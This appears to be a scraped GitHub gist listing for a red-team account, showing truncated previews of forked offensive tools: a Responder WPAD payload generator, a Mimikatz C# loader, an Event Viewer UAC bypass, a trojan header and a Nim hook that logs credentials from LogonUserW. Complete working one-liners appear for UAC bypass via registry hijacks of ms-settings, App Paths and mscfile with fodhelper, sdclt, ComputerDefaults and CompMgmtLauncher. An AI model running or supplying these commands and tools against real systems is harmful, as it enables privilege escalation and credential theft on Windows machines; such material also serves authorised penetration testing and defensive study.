This script generates a payload for use with Responder.
- Generate a payload with
main.py - Copy and paste the one-liner output into the
WPADScriptfield ofResponder.conf.
test@test:~$ python3 main.py --help
usage: main.py [-h] [-o OUT] cmd
RedTeams
RedTeams
/ server.py
Last active
June 11, 2025 13:52
— forked from mildred/server.py
Python 3 http.server with PUT support
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| import argparse | |
| import http.server | |
| import os | |
| class HTTPRequestHandler(http.server.SimpleHTTPRequestHandler): | |
| def do_PUT(self): | |
| path = self.translate_path(self.path) | |
| if path.endswith('/'): |
RedTeams
/ README.md
Created
June 6, 2025 11:08
— forked from jthuraisamy/README.md
CVE-2017-11907 WPAD.dat Generator for Responder
RedTeams
/ katz.cs
Created
May 28, 2025 09:07
— forked from pljoel/katz.cs
Updated Katz.cs - Mimikatz 2.1.1
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Text; | |
| using System.IO.Compression; | |
| using System.EnterpriseServices; | |
| using System.Collections.Generic; | |
| using System.Runtime.InteropServices; | |
| using System.Security.Cryptography; | |
| /* |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Upon attempting compiling the code in the Github repo via the visual studio 2022 x64 developer console, I got the following errors | |
| cl.exe /EHsc /W4 /Fe:program.exe source.cpp /link Advapi32.lib Psapi.lib | |
| source.cpp(34): error C2664: 'BOOL ConvertSidToStringSidA(PSID,LPSTR *)': cannot convert argument 2 from 'wchar_t **' to 'LPSTR *' | |
| source.cpp(34): note: Types pointed to are unrelated; conversion requires reinterpret_cast, C-style cast or parenthesized function-style cast | |
| C:\Program Files (x86)\Windows Kits\10\\include\10.0.22621.0\\shared\sddl.h(267): note: see declaration of 'ConvertSidToStringSidA' | |
| source.cpp(34): note: while trying to match the argument list '(PSID, wchar_t **)' | |
| source.cpp(68): error C2664: 'std::string wcharToString(wchar_t [])': cannot convert argument 1 from 'CHAR [260]' to 'wchar_t []' | |
| source.cpp(68): note: Types pointed to are unrelated; conversion requires reinterpret_cast, C-style cast or parenthesized function-style cast |
RedTeams
/ lolbin_execution.md
Created
April 24, 2025 09:06
— forked from havoc3-3/lolbin_execution.md
Proxied Execution techniques utilizing registry hijacks.
reg.exe add HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\open\command /ve /d "C:\Windows\System32\cmd.exe /c C:\Windows\System32\calc.exe" /f
reg.exe add HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\open\command /v "DelegateExecute" /t REG_SZ /d "" /f
C:\Windows\System32\ComputerDefaults.exe
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // https://blog.eswlnk.com/9612.html/2 | |
| // https://github.com/iyzyi/Mua-Remote-Control-Trojan/blob/main/DOCUMENT.md | |
| #pragma once | |
| #include <Windows.h> | |
| #include <objbase.h> | |
| #include <strsafe.h> |
RedTeams
/ .cmd
Created
April 23, 2025 08:35
— forked from xillwillx/.cmd
UAC bypass methods with high integrity - credits to @enigma0x3 / @0rbz_ / @winscripting
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| **UAC bypass for Win10:** | |
| reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /d "cmd.exe" /f && START /W sdclt.exe && reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f | |
| **UAC bypass for Win10:** | |
| reg add HKCU\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /f && reg add HKCU\Software\Classes\ms-settings\shell\open\command /d "cmd /c start powershell.exe" /f && START /W fodhelper.exe && reg delete HKCU\Software\Classes\ms-settings /f | |
| **UAC bypass for 7/8/10:** | |
| reg add HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command /d "cmd.exe" /f && START /W CompMgmtLauncher.exe && reg delete HKEY_CURRENT_USER\Software\Classes\mscfile /f |
RedTeams
/ Get-IntegrityLevel.ps1
Created
April 10, 2025 12:11
— forked from jonny-jhnson/Get-IntegrityLevel.ps1
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| if (-not ('TokenInformation.ProcessNativeMethods' -as [type])){ | |
| $TypeDef = @' | |
| using System; | |
| using System.Runtime.InteropServices; | |
| namespace TokenInformation { | |
| [Flags] | |
| public enum ProcessAccess { | |
| All = 0x001FFFFF, | |
| Terminate = 0x00000001, |
RedTeams
/ EventVwrBypass.cs
Created
April 10, 2025 11:47
— forked from leoloobeek/EventVwrBypass.cs
Event Viewer UAC Bypass in CSharp for use with InstallUtil.exe
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Linq; | |
| using System.Reflection; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| using Microsoft.Win32; | |
| /* | |
| InstallUtil.exe C# version of Event Viewer UAC bypass |
RedTeams
/ LogonUserSpy.nim
Created
March 31, 2025 07:06
— forked from rotarydrone/LogonUserSpy.nim
LogonUserSpy.nim - Hooking advapi32!LogonUserW to log credentials
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #[ | |
| PoC for hooking advapi32!LogonUserW to log credentials | |
| Patch and restore the function when called, original credit for 99% of the code is here: https://github.com/byt3bl33d3r/OffensiveNim/blob/master/src/Hook.nim | |
| Log to a named pipe server (must be started/managed by separate listener), and/or log to a file | |
| by default, just logs to C:\users\public\log.txt | |
| Compile: | |
| nim c -d=mingw --app=lib -d:release --nomain LogonUserSpy.nim |
NewerOlder